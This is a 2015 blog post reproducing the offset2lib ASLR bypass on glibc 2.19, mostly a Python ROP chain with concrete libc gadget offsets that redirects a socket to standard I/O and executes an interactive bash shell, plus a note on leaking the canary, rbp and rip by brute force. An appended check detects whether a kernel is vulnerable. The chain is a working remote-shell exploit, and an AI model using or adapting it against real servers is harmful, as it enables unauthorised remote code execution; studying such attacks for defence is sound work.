zerons's Blog

For The Dream

Testing offset2lib against glibc 2.19

zerons posted @ 7 April 2015 14:47 in sec, 584 reads

ref http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html


Environment: Ubuntu 14.04.2, glibc 2.19, kernel 3.18.9


The .py file has to be adapted to the gadget offsets of glibc 2.19:

off = libc_base

# dup2 to the three standard I/O FD (STDIN, STDOUT, STDERR)
# dup2(4,0)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x0)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) # dup2 (syscall 33)
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,1)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x1)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) # dup2 (syscall 33)
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,2)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x2)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) # dup2 (syscall 33)
p += pack('Q', off) #padding
p += pack('Q', off) #padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret


p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "/bin/bas" # /bin/bas
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf088) # @ .data + 8
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "hAAAAAAA" # hAAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf089) # @ .data + 9
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "-iAAAAAA" # -iAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08c) # @ .data + 12
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf095) # @ .data + 21
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data

p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13

p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29

p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x000000000000003b) #  execve
p += pack("Q", off) #padding
p += pack("Q", off) #padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

The code recovers the offsets one by one by repeatedly comparing the values the server process returns: first the canary, then rbp, then rip. From rip the program's load base can be derived, and from that the load base of libc; using the offsets of the required instructions within libc, the chain duplicates the socket file descriptor onto the standard streams and executes bash.
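The step "program base gives libc base" only works because, on this kernel, a PIE executable is loaded at a fixed distance from the shared libraries. The following check is added here (it is not code from the post or from the offset2lib authors): it reads `/proc/<pid>/maps` dumps from several runs and reports whether the exe-to-libc distance is constant, which is exactly the offset2lib condition; kernels that randomize the ET_DYN load base separately from the mmap region (Linux 4.1 and later) show a varying distance. The sample dumps, the `/srv/server` path and the inode numbers are constructed placeholders.

```python
import os
import re
import subprocess
import sys

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
_MAPS_RE = re.compile(r"^([0-9a-f]+)-[0-9a-f]+\s+\S+\s+\S+\s+\S+\s+\S+\s*(.*)$")

def parse_maps(text):
    """Yield (start, path) for every mapping in a /proc/<pid>/maps dump."""
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if m:
            yield int(m.group(1), 16), m.group(2)

def exe_to_libc_distance(text, exe_path):
    """Signed libc_base - exe_base for one process image; None if either is missing."""
    maps = list(parse_maps(text))
    exe = [s for s, p in maps if p == exe_path]
    libc = [s for s, p in maps if re.search(r"/libc[-.]", p)]
    return min(libc) - min(exe) if exe and libc else None

def distance_is_constant(dumps, exe_path):
    """True when every run shows the same distance, i.e. one leaked exe address yields libc."""
    dists = {exe_to_libc_distance(d, exe_path) for d in dumps}
    return None not in dists and len(dists) == 1

# Constructed sample dumps (not real captures). Kernels before 4.1 load a PIE at
# mmap_base with libc right below it, so the distance repeats between runs; later
# kernels randomize the executable base separately, so it does not.
VULN_RUNS = [
    "7f3a1bdf8000-7f3a1bfb3000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so\n"
    "7f3a1c3bc000-7f3a1c3bd000 r-xp 00000000 08:01 1234 /srv/server\n",
    "7f91d4d0c000-7f91d4ec7000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so\n"
    "7f91d52d0000-7f91d52d1000 r-xp 00000000 08:01 1234 /srv/server\n",
]
FIXED_RUNS = [
    "55e0c2a00000-55e0c2a01000 r-xp 00000000 08:01 1234 /srv/server\n"
    "7f3a1bdf8000-7f3a1bfb3000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so\n",
    "5589fa200000-5589fa201000 r-xp 00000000 08:01 1234 /srv/server\n"
    "7f91d4d0c000-7f91d4ec7000 r-xp 00000000 08:01 5678 /lib/x86_64-linux-gnu/libc-2.19.so\n",
]

if __name__ == "__main__":
    # Live check of this host: three fresh interpreter processes dump their own maps.
    # Only meaningful if the interpreter is a PIE (a non-PIE binary sits at a fixed address).
    exe = os.path.realpath(sys.executable)
    cmd = [sys.executable, "-c", "import sys; sys.stdout.write(open('/proc/self/maps').read())"]
    try:
        dumps = [subprocess.run(cmd, capture_output=True, text=True, check=True).stdout for _ in range(3)]
        print("offset2lib applies" if distance_is_constant(dumps, exe) else "exe/libc distance varies (or mapping not found)")
    except (OSError, subprocess.CalledProcessError):
        print("no /proc/<pid>/maps on this host")
```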

